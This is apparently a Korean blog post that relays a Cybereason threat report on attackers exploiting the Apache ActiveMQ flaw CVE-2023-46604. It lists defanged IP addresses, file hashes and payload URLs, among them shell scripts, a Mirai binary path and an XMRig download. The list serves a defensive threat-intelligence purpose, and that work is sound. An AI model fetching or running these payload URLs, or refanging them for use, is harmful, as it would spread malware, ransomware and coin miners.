메신저를 조심하고 ActiveMQ 취약성을 이용 관련 IOC 67개 발견

Impotant:
https://transfer[.]sh/EewPaMsAUA/xmrig
http://172[.]245[.]16[.]125/[.]exec
184[.]105[.]247[.]254
65[.]49[.]1[.]38
http://91[.]192[.]223[.]44
167[.]248[.]133[.]52
199[.]45[.]155[.]17
http://82[.]115[.]220[.]81
http://172[.]245[.]16[.]125/curlfinish
http://27[.]102[.]128[.]152:8098/bit[.]ico
01c6c81abf1206caf6c4004bae8c4999624228c8b1ce7514503e4150c10c21b5
http://165[.]22[.]16[.]135
http://153[.]92[.]1[.]49:83/wk[.]sh
176[.]105[.]255[.]60
http://184[.]105[.]247[.]254
172[.]245[.]16[.]125
http://27[.]102[.]128[.]152:5678/fav[.]ico
http://87[.]236[.]176[.]108
156[.]96[.]155[.]233
http://194[.]165[.]16[.]111
27[.]102[.]67[.]64
27[.]102[.]128[.]152
http://91[.]192[.]223[.]44:9333/jQ
http://172[.]245[.]16[.]125/already
194[.]165[.]16[.]111
http://153[.]92[.]1[.]49:82/e[.]sh
http://65[.]49[.]1[.]38
http://82[.]115[.]220[.]81/bins/x86
http://172[.]245[.]16[.]125
http://68[.]69[.]186[.]14
38[.]54[.]88[.]83
87[.]236[.]176[.]108
http://153[.]92[.]1[.]49:81/c[.]sh
82[.]115[.]220[.]81
34[.]100[.]208[.]153
68[.]69[.]186[.]14
153[.]92[.]1[.]49
http://38[.]54[.]88[.]83
http://transfer[.]sh
6cb3d4d12357c63e654cf8c7062df0b07d22cf676307598bbf703de5258da519
http://162[.]142[.]125[.]216
http://27[.]102[.]128[.]152
http://45[.]32[.]120[.]181
http://34[.]100[.]208[.]153
cdc6e88a31e3a6f559b33b1249a5c4fa44f8c254b2437a5b6b06ff8c8c4d4c1d
http://87[.]236[.]176[.]25
http://167[.]248[.]133[.]52
http://178[.]32[.]197[.]83
162[.]142[.]125[.]216
http://156[.]96[.]155[.]233:8855/2[.]sh
45[.]32[.]120[.]181
http://156[.]96[.]155[.]233:8855/1[.]sh
87[.]236[.]176[.]25
91[.]192[.]223[.]44
c0cc0fcbbef380108d7522a778c0beb5e0ecc876bb7dd12bcbcea40ded39f321
http://156[.]96[.]155[.]233
http://transfer[.]sh/EewPaMsAUA/xmrig
http://176[.]105[.]255[.]60
http://199[.]45[.]155[.]17
7af5c37cc308a222f910d6a7b0759837f37e3270e22ce242a8b59ed4d7ec7ceb
178[.]32[.]197[.]83
165[.]22[.]16[.]135
http://27[.]102[.]67[.]64:5678/fav[.]ico
http://45[.]32[.]120[.]181/linux[.]sh
http://172[.]245[.]16[.]125/wgetfinish
http://172[.]245[.]16[.]125/down

요약:
Cybereason Security Services는 사이버 시즌 보안 서비스를 위해 위협 분석 보고서를 발행하여 위협에 영향을 미치는 것을 알리고, 이러한 위협을 조사하고 보호하기 위한 실질적인 권장 사항을 제공합니다. 10월 27일 CVE-2023-46604로 공개된 원격 코드 실행 취약점을 활용해 Linux 서버에서 Apache ActiveMQ를 실행하는 Java 프로세스에서 악의적인 쉘 실행을 발견하였으며, 이는 Mirai Botnet, Hellokitty Ransomware, Sparkrat 실행 파일 및 XMRIG를 포함한 Coinminers의 다운로드를 시도하는 것으로 강력하게 평가됩니다.

Open New Windows

메신저를 조심하고 ActiveMQ 취약성을 이용:
https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability

Next Post Previous Post
No Comment
Add Comment
comment url